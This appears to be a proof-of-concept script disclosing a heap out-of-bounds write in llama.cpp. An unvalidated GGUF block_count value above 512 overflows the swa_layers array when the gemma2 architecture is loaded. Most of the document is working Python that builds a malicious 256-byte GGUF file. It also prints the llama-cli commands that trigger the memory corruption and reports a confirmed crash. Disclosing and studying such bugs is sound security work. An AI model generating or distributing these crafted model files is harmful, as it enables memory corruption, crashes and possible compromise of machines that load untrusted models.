| |
| """ |
| PoC: Heap OOB write in llama.cpp via unvalidated n_layer (block_count) parameter. |
| |
| Vulnerability: |
| In src/llama-model.cpp line 520, hparams.n_layer is read from the GGUF file: |
| ml.get_key(LLM_KV_BLOCK_COUNT, hparams.n_layer); |
| |
| There is NO upper bound check against LLAMA_MAX_LAYERS (512). |
| |
| However, the hparams arrays that are indexed by layer number are all |
| std::array<..., LLAMA_MAX_LAYERS> where LLAMA_MAX_LAYERS = 512: |
| std::array<uint32_t, 512> swa_layers; |
| std::array<bool, 512> recurrent_layer_arr; |
| std::array<uint32_t, 512> n_head_arr; |
| std::array<uint32_t, 512> n_head_kv_arr; |
| std::array<uint32_t, 512> n_ff_arr; |
| |
| Note: n_expert IS checked (line 537: GGML_ASSERT(hparams.n_expert <= LLAMA_MAX_EXPERTS)), |
| proving the developers intended bounds checks but missed n_layer. |
| |
| Exploitation path (gemma2 architecture): |
| In the LLM_ARCH_GEMMA2 case (line 1323), set_swa_pattern(2) is called |
| at line 1327 BEFORE any other key reads. |
| |
| set_swa_pattern() in llama-hparams.cpp does: |
| for (uint32_t il = 0; il < n_layer; ++il) { |
| swa_layers[il] = ...; |
| } |
| |
| When n_layer = 10000, this writes 9488 uint32_t values (9488 * 4 = 37952 bytes) |
| past the end of the swa_layers[512] array on the heap, corrupting through |
| the rest of hparams and past the end of the llama_model allocation. |
| |
| The common-path get_key_or_arr() calls for n_ff_arr and n_head_arr at |
| lines 570-576 DO have an n > N_MAX check, but only AFTER checking if the |
| key exists. Since these keys are optional (required=false), omitting them |
| from the GGUF file causes an early return before the bounds check, allowing |
| execution to reach the arch-specific switch case. |
| |
| Attack: |
| - GGUF v3 file with architecture = "gemma2" |
| - block_count = 10000 (way above 512 limit) |
| - Minimal required keys: context_length, embedding_length, block_count |
| - The OOB write corrupts heap memory past the llama_model allocation |
| |
| Confirmed results: |
| - ASan build: heap-buffer-overflow detected at llama-hparams.cpp:15 |
| in llama_hparams::set_swa_pattern(), WRITE of size 4 |
| - Regular build: SIGSEGV (exit code 139) due to heap corruption |
| - Only 256-byte GGUF file needed (zero tensors, minimal KV pairs) |
| """ |
|
|
| import struct |
| import os |
|
|
| |
| GGUF_MAGIC = b"GGUF" |
| GGUF_VERSION = 3 |
|
|
| |
| GGUF_TYPE_UINT32 = 4 |
| GGUF_TYPE_FLOAT32 = 6 |
| GGUF_TYPE_STRING = 8 |
|
|
| |
| |
| |
| |
| MALICIOUS_N_LAYER = 10000 |
|
|
|
|
| def write_string(f, s): |
| """Write a GGUF string: uint64 length + chars (no null terminator).""" |
| encoded = s.encode('utf-8') |
| f.write(struct.pack('<Q', len(encoded))) |
| f.write(encoded) |
|
|
|
|
| def write_kv_string(f, key, value): |
| """Write a KV pair with string value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_STRING)) |
| write_string(f, value) |
|
|
|
|
| def write_kv_uint32(f, key, value): |
| """Write a KV pair with uint32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_UINT32)) |
| f.write(struct.pack('<I', value)) |
|
|
|
|
| def write_kv_float32(f, key, value): |
| """Write a KV pair with float32 value.""" |
| write_string(f, key) |
| f.write(struct.pack('<I', GGUF_TYPE_FLOAT32)) |
| f.write(struct.pack('<f', value)) |
|
|
|
|
| def create_nlayer_oob_gguf(output_path): |
| """Create a GGUF file that triggers heap OOB write via n_layer > 512.""" |
|
|
| |
| arch = "gemma2" |
|
|
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
| |
|
|
| kv_pairs = [ |
| ("string", "general.architecture", arch), |
| ("uint32", f"{arch}.context_length", 8192), |
| ("uint32", f"{arch}.embedding_length", 256), |
| ("uint32", f"{arch}.block_count", MALICIOUS_N_LAYER), |
| ("float32", f"{arch}.attention.layer_norm_rms_epsilon", 1e-6), |
| ] |
|
|
| n_kv = len(kv_pairs) |
| n_tensors = 0 |
|
|
| with open(output_path, 'wb') as f: |
| |
| f.write(GGUF_MAGIC) |
| f.write(struct.pack('<I', GGUF_VERSION)) |
| f.write(struct.pack('<Q', n_tensors)) |
| f.write(struct.pack('<Q', n_kv)) |
|
|
| |
| for kv_type, key, value in kv_pairs: |
| if kv_type == "string": |
| write_kv_string(f, key, value) |
| elif kv_type == "uint32": |
| write_kv_uint32(f, key, value) |
| elif kv_type == "float32": |
| write_kv_float32(f, key, value) |
|
|
| |
| |
| |
| current_pos = f.tell() |
| alignment = 32 |
| padding_needed = (alignment - (current_pos % alignment)) % alignment |
| f.write(b'\x00' * padding_needed) |
|
|
| file_size = os.path.getsize(output_path) |
| print(f"[*] Created: {output_path}") |
| print(f"[*] File size: {file_size} bytes") |
| print(f"[*] Architecture: {arch}") |
| print(f"[*] block_count (n_layer): {MALICIOUS_N_LAYER} (LLAMA_MAX_LAYERS = 512)") |
| print(f"[*]") |
| print(f"[*] Vulnerability: set_swa_pattern() at llama-model.cpp:1327 writes") |
| print(f"[*] swa_layers[il] for il = 0..{MALICIOUS_N_LAYER-1}") |
| print(f"[*] but swa_layers is std::array<uint32_t, 512>") |
| print(f"[*] => {MALICIOUS_N_LAYER - 512} OOB writes = {(MALICIOUS_N_LAYER - 512) * 4} bytes past end") |
| print(f"[*]") |
| print(f"[*] Test with:") |
| print(f"[*] ./build/bin/llama-cli -m {output_path} -p 'hello'") |
| print(f"[*]") |
| print(f"[*] Test with ASan build:") |
| print(f"[*] ./build-asan/bin/llama-cli -m {output_path} -p 'hello'") |
| print(f"[*]") |
| print(f"[*] Expected: heap-buffer-overflow or crash") |
|
|
|
|
| if __name__ == "__main__": |
| os.makedirs(os.path.dirname(os.path.abspath(__file__)), exist_ok=True) |
| output_path = "/Users/eltarne/Documents/script/gguf_poc/poc_nlayer_oob.gguf" |
| create_nlayer_oob_gguf(output_path) |
|
|